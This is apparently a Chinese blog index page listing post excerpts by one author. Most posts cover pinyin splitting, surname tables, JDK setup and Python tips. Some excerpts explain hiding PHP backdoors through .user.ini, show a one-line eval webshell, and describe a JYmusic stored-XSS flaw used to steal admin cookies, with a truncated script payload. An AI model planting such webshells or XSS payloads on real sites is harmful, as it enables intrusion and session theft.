摘要: 0x00 前言 在PHP中有个很有趣的东西叫.user.ini,有点类似.htaccess文件,PHP会在每个目录下扫描INI文件,我们可以通过.user.ini文件来实现隐藏后门的效果 官方手册地址:传送门 通过阅读手册,我们知道在.user.ini中可以识别PHP_INI_PERDIR和PHP_ 阅读全文
posted @ 2024-03-08 10:11 WaxToday 阅读(30) 评论(0) 推荐(0) 编辑
摘要: 0x01 原理 这里先给大家介绍一句话木马和菜刀的工作原理,了解的可以往下面翻 一句话木马 先说说一句话木马的原理 <?php eval($_POST['c']);?> 先说说eval()这个函数 简单点说,eval()这个函数会把参数当作代码来执行 什么叫做把参数当作代码来执行,简单举个例子 <? 阅读全文
posted @ 2024-03-08 10:04 WaxToday 阅读(17) 评论(0) 推荐(0) 编辑
摘要: 整理的常见姓氏速查表,发现没有的请留言,会在第一时间补上 A a 阿 ai 艾 爱新觉罗 哀 爱 an 安 ang 昂 ao 敖 B ba 巴 bai 白 柏 拜 百 百里 ban 班 板 bao 鲍 包 暴 褒 保 宝 薄 bei 贝 孛 邶 北 卑 ben 贲 本 bi 毕 碧鲁 闭 碧 bia 阅读全文
posted @ 2024-03-08 09:34 WaxToday 阅读(129) 评论(0) 推荐(0) 编辑
摘要: 0x00 何为类和对象 说到序列化和反序列化就不得不提到两个词:类和对象 那么什么是类,什么是对象 教科书式的答案是类是对象的抽象,对象是类的实例 那啥叫个抽象,啥叫个实例呢 简单的说,类就是对象的一个标准模板,而对象就是按照模板做出来的实物 举个栗子 人,是一个类 所有的人都有一个脑袋两个胳膊两个 阅读全文
posted @ 2024-03-05 18:35 WaxToday 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 在《Python之拼音拆分》一文中已经给出了解决办法,但最近又遇到一些新的问题。 一号同学最近在写一个工具,需要根据拼音字符串拆分出来所有可能的拼音组合 这么说可能大家不太理解,比如 zhangangai 可以拆分为 zhan gan gai zhan gang ai zhang an gai zh 阅读全文
posted @ 2024-03-05 17:34 WaxToday 阅读(84) 评论(0) 推荐(0) 编辑
摘要: 经常会需要用到将zhangwei转化为ZhangWei、Zw、Zhangw之类的,就涉及到一个拼音拆分算法,这里写了一个demo分享给大家 我的思路是先将声母转换为大写,然后就可以根据大写字母来分割单个拼音 学的拼音早忘差不多了,百度了一下,声母有bpmfdtnlgkhjqxrzczyw 转化代码 阅读全文
posted @ 2024-03-05 17:28 WaxToday 阅读(112) 评论(0) 推荐(0) 编辑
摘要: 上代码 @echo off @echo 一键配置jdk环境变量 @echo by wkong、 @echo. cd /d %~dp0 set mypath=%~dp0 REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Sessi 阅读全文
posted @ 2024-03-05 16:07 WaxToday 阅读(30) 评论(0) 推荐(0) 编辑
摘要: 0x00 吐槽 最近让项目坑的没办法,老写一些脚本来协助工作,刚好在测试python生成word的时候遇到需要随机字符串来命名文档名,简单写点东西记录一下 0x01 一班的童靴 其实随机字符串这个东西在任何语言里都经常会用到,而且解决方法也简单 首先定义一个字符串,随机字符串就从这里面取,然后根据要 阅读全文
posted @ 2024-03-05 14:13 WaxToday 阅读(35) 评论(0) 推荐(0) 编辑
摘要: 本渣PHP屌丝一枚,最近在用Python做一个东西碰到了这个问题,在这里给没踩过坑的朋友分享下 以Python 2.7为例 从前有座山 碰到参数特别多的情况的时候总是看着一堆if...else if抓狂,斩不断,理还乱,幸好有Switch...Case可以很方便的处理多种情况的参数 但是在Pytho 阅读全文
posted @ 2024-03-05 13:49 WaxToday 阅读(22) 评论(0) 推荐(0) 编辑
摘要: JYmusic 是一款开源的跨平台音乐管理系统。 有着清新的界面和强大的功能。 jymusic界面 在2.0版本中发现了一个可以打管理员cookie的漏洞 利用条件 1.登录会员 2.认证音乐人 上传音乐时,抓包,修改name或者cover_url参数 值为: XSS"><script>alert( 阅读全文
posted @ 2024-03-05 13:43 WaxToday 阅读(82) 评论(0) 推荐(0) 编辑